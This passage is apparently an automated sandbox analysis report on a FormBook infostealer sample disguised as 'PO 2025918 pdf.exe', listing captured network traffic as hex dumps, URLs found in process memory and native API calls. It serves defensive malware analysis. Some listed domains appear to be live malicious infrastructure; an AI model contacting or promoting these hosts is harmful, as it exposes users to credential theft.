69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 11:02:25 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 11:02:27 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 14 Jan 2025 11:02:47 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 14 Jan 2025 11:02:50 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 14 Jan 2025 11:02:52 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 14 Jan 2025 11:02:55 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 14 Jan 2025 11:03:12 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: ROUTE.EXE, 00000008.00000002.3898549588.000000000406C000.00000004.10000000.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000003D4C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/ktot/?Gxq=1VbhX6&amp;t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9
                      Source: ROUTE.EXE, 00000008.00000002.3898549588.000000000406C000.00000004.10000000.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000003D4C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/ktot/?Gxq=1VbhX6&t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2200491712.00000000033E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: PO 2025918 pdf.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                      Source: mIrIhAjAJblou.exe, 0000000A.00000002.3898145012.00000000057E8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.letsbookcruise.xyz
                      Source: mIrIhAjAJblou.exe, 0000000A.00000002.3898145012.00000000057E8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.letsbookcruise.xyz/coi2/
                      Source: ROUTE.EXE, 00000008.00000002.3898549588.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000003896000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.vh5g.sbs/
                      Source: ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000004526000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fasthosts.co.uk/
                      Source: ROUTE.EXE, 00000008.00000002.3898549588.0000000003EDA000.00000004.10000000.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000003BBA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                      Source: ROUTE.EXE, 00000008.00000002.3896051765.0000000002BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: ROUTE.EXE, 00000008.00000002.3896051765.0000000002BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: ROUTE.EXE, 00000008.00000002.3896051765.0000000002BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: ROUTE.EXE, 00000008.00000002.3896051765.0000000002BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: ROUTE.EXE, 00000008.00000002.3896051765.0000000002BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: ROUTE.EXE, 00000008.00000002.3896051765.0000000002BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: ROUTE.EXE, 00000008.00000003.2639035021.00000000079B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: ROUTE.EXE, 00000008.00000002.3898549588.0000000004846000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3899866367.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000004526000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.fasthosts.co.uk/icons/favicon.ico
                      Source: ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: ROUTE.EXE, 00000008.00000002.3898549588.0000000004846000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3899866367.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000004526000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par
                      Source: ROUTE.EXE, 00000008.00000002.3898549588.0000000004846000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3899866367.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000004526000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/domain-names/search/?domain=$
                      Source: ROUTE.EXE, 00000008.00000002.3898549588.0000000004846000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3899866367.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000004526000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_do_
                      Source: ROUTE.EXE, 00000008.00000002.3898549588.0000000003A24000.00000004.10000000.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000003704000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2748637033.00000000162B4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: ROUTE.EXE, 00000008.00000002.3898549588.0000000004846000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3899866367.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000004526000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-199510482-1

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 5.2.PO 2025918 pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.PO 2025918 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.3895858991.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2458301870.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3898145012.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3895986128.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3896619038.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2460325125.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0042C9C3 NtClose,5_2_0042C9C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0040AD20 NtDelayExecution,5_2_0040AD20
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2B60 NtClose,LdrInitializeThunk,5_2_016D2B60
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_016D2DF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_016D2C70
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D35C0 NtCreateMutant,LdrInitializeThunk,5_2_016D35C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D4340 NtSetContextThread,5_2_016D4340
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D4650 NtSuspendThread,5_2_016D4650
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2BE0 NtQueryValueKey,5_2_016D2BE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2BF0 NtAllocateVirtualMemory,5_2_016D2BF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2BA0 NtEnumerateValueKey,5_2_016D2BA0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2B80 NtQueryInformationFile,5_2_016D2B80
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2AF0 NtWriteFile,5_2_016D2AF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2AD0 NtReadFile,5_2_016D2AD0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2AB0 NtWaitForSingleObject,5_2_016D2AB0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2D30 NtUnmapViewOfSection,5_2_016D2D30
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2D00 NtSetInformationFile,5_2_016D2D00
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2D10 NtMapViewOfSection,5_2_016D2D10
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2DD0 NtDelayExecution,5_2_016D2DD0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2DB0 NtEnumerateKey,5_2_016D2DB0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2C60 NtCreateKey,5_2_016D2C60
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2C00 NtQueryInformationProcess,5_2_016D2C00
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2CF0 NtOpenProcess,5_2_016D2CF0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2CC0 NtQueryVirtualMemory,5_2_016D2CC0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2CA0 NtQueryInformationToken,5_2_016D2CA0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2F60 NtCreateProcessEx,5_2_016D2F60
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2F30 NtCreateSection,5_2_016D2F30
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2FE0 NtCreateFile,5_2_016D2FE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2FA0 NtQuerySection,5_2_016D2FA0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2FB0 NtResumeThread,5_2_016D2FB0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2F90 NtProtectVirtualMemory,5_2_016D2F90
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2E30 NtWriteVirtualMemory,5_2_016D2E30
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2EE0 NtQueueApcThread,5_2_016D2EE0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2EA0 NtAdjustPrivilegesToken,5_2_016D2EA0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2E80 NtReadVirtualMemory,5_2_016D2E80
